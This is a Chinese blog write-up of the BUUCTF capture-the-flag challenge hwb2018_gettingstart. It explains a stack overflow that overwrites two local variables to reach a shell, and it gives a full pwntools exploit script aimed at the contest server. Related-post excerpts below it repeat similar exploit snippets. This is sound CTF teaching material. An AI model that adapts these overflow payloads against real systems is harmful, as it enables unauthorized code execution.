BUUCTF pwn hwb2018_gettingstart

最新推荐文章于 2024-03-27 16:20:09 发布
最新推荐文章于 2024-03-27 16:20:09 发布
阅读量739 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: pwn安全 文章标签: python 安全 shell pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/113529460
本文介绍如何使用IDA查看程序流程,并通过设置v7和v8的特定值来获得shell。通过构造payload并发送到远程服务器,演示了从逆向分析到漏洞利用的全过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看程序保护
在这里插入图片描述
IDA打开查看程序流
在这里插入图片描述
读入buf的内容会覆盖v7和v8的值,那么控制v7=0x7FFFFFFFFFFFFFFF和v8=0.1,即可获得shell

这里v8的二进制值可以直接在程序里找到
在这里插入图片描述
或者在网站http://www.binaryconvert.com/convert_double.html 输入0.1也可获得
在这里插入图片描述
完整ex

from pwn import *

context(log_level='debug')

#io=process("./task_gettingStart_ktQeERc")
io=remote("node3.buuoj.cn",29872)

io.recv()

v7=0x7FFFFFFFFFFFFFFF
v8=0x3FB999999999999A

payload=b'A'*0x18+p64(v7)+p64(v8)

io.send(payload)

io.recv()

io.interactive()
2018护网杯pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1366
下载后   本来想先用checksec 看看有啥保护 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 420
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTFhwb2018_gettingstart
weixin_51055545的博客
04-30 1113
想找一道高分题来做一做,想着会很难,但分析了IDA,才发现如此简单. 检查保护: 基本上全开了, IDA分析: 主函数中,满足这个条件就会直接get shell,直接覆盖即可, exp: from pwn import * elf = ELF('./task_gettingStart_ktQeERc') io = remote('node4.buuoj.cn',27594) #io = process('./task_gettingStart_ktQeERc') libc = elf.libc cont
护网杯_2018_gettingstart
z1r0的博客
02-01 1211
护网杯_2018_gettingstart 查看保护 v7=0x7fff。。。。v8=0.1时会拿到shell 而buf里面包含了v7和v8所以可以对v7和v8进行修改 v8在内在里面可以使用https://binaryconvert.com/result_double.html?decimal=04046049 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' d
[BUUCTF]PWN——护网杯_2018_gettingstart
mcmuyanga的博客
03-18 799
护网杯_2018_gettingstart 例行检查,64位程序,除了RELRO,其他全开 试运行一下,看看大概的情况 64位ida载入 当满足v5=0x7FFFFFFFFFFFFFFFLL并且v6=0.1的时候就能够获取shell,看一下栈布局 确定了偏移,可以在读入buf的时候修改v5和v6的值 这题没什么难度,v5的值可以直接表示,只是要注意一下0.1在内存中的表示。内存中存放的是数据的补码,浮点型数据的在内存中按照IEEE754 标准存储。有兴趣的师傅可以百度看看怎么算。这边在其他师傅的博
[BUUCTF-pwn] hwb2018_calendar
weixin_52640415的博客
02-04 355
我讨厌爆破,还是两次 堆地址+_IO_2_1_stdout_ 题目给了一个很明显的UAF void m3free() { int v0; // [rsp+Ch] [rbp-4h] v0 = readid(); if ( v0 != -1 ) free((void *)qword_202060[v0]); } 但是也有些限制,一是大小最大0x68,二是活动块只能建4个(这个无所谓,有俩用的就行) 另外edit里一个读入的函数有点坑,读入n+1个字符,n还不能为0,最少2个。这样
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1119
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2647
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
buuctfpwn1_sctf_2016
weixin_54452942的博客
03-27 867
简单易懂~
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 544
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF(pwn)护网杯_2018_gettingstart
半岛铁盒的博客
04-04 235
from pwn import * p=remote("node3.buuoj.cn",26480) payload='a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A) p.sendline(payload) p.interactive() 第一步:计算偏移量 为 0x18 第二步 把0.1 转化成在内存中表示的形式
BUUCTF刷题7
m0_51251108的博客
11-09 439
题目:护网杯_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网杯_2018_gettingstart:(浮点数内存表示) 参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀
buuoj Pwn writeup 216-220
yongbaoii的博客
08-31 583
216 hwb2018_gettingstart 溢出覆盖就好,唯一有个浮点数,网上网站一大把,找一个转换一下就好。 exp from pwn import * context(log_level='debug') r=remote("node4.buuoj.cn","25539") r.recv() v7=0x7FFFFFFFFFFFFFFF v8=0x3FB999999999999A payload='a'*0x18+p64(v7)+p64(v8) r.send(payload) r.
2018护网杯easy_tornado(BUUCTF提供复现)
giaogiao123的博客
01-31 1083
进入页面首先看一下flag.txt file?filename=/flag.txt&filehash=9f1a5c8c40be3aafbc5e719d151b1d36 换成fllllllllllllg试一试 出现error 然后一脸懵逼,查阅资料发现这是一个SSTI注入,原理跟SQL注入一样,但是上图把 又查阅资料发现尝试进行验证: 传递error?msg={{2}},页面出现2 传递er...
2018护网杯_fez_签到_gettingstart
uiop_uiop_uiop的博客
10-13 1432
fez  题目给了两个文件: fez.py: import os def xor(a,b): assert len(a)==len(b) c="" for i in range(len(a)): c+=chr(ord(a[i])^ord(b[i])) return c def f(x,k): return xor(xor(x,k)...
BUUCTF pwn qctf_2018_dice_game
热门推荐
stareforever的博客
12-25 3万+
查看保护 程序流程 输入name后 连续猜对50次随机数即可获得flag 输入buf的可以覆盖栈上的内容,那么输入0x50个字符就可以覆盖seed,最终产生的随机数就是定值了 考虑输入0x50个‘A’,那么写c程序 可以获得生成的随机数列表 3, 3, 2, 1, 5, 3, 4, 6, 3, 4, 2, 2, 3, 2, 1, 1, 4, 5, 4, 6, 3, 6, 4, 3, 4, 2, 2, 6, 1, 2, 2, 3, 4, 1, 2, 1, 4, 5, 4, 6, 6, 5, 1, 3,
pwn题bbctf_2020_fmt_me
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
XCTF 攻防世界 pwn CGfsb
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
BUUCTF pwn 鹏城杯_2018_code
stareforever的博客
12-28 2万+
查看保护 程序流程 先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数 check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’; 另一个函数要求如下结果 这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律) 相应的结果如下 可以发现结果是递增的,并且 那么可以猜测进行测试 确定第一个为w,后面以从类推 那么输入‘wyBTs’即可成功通过检测 进入到have_fu
buuctf pwn others_shellcode
最新发布
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值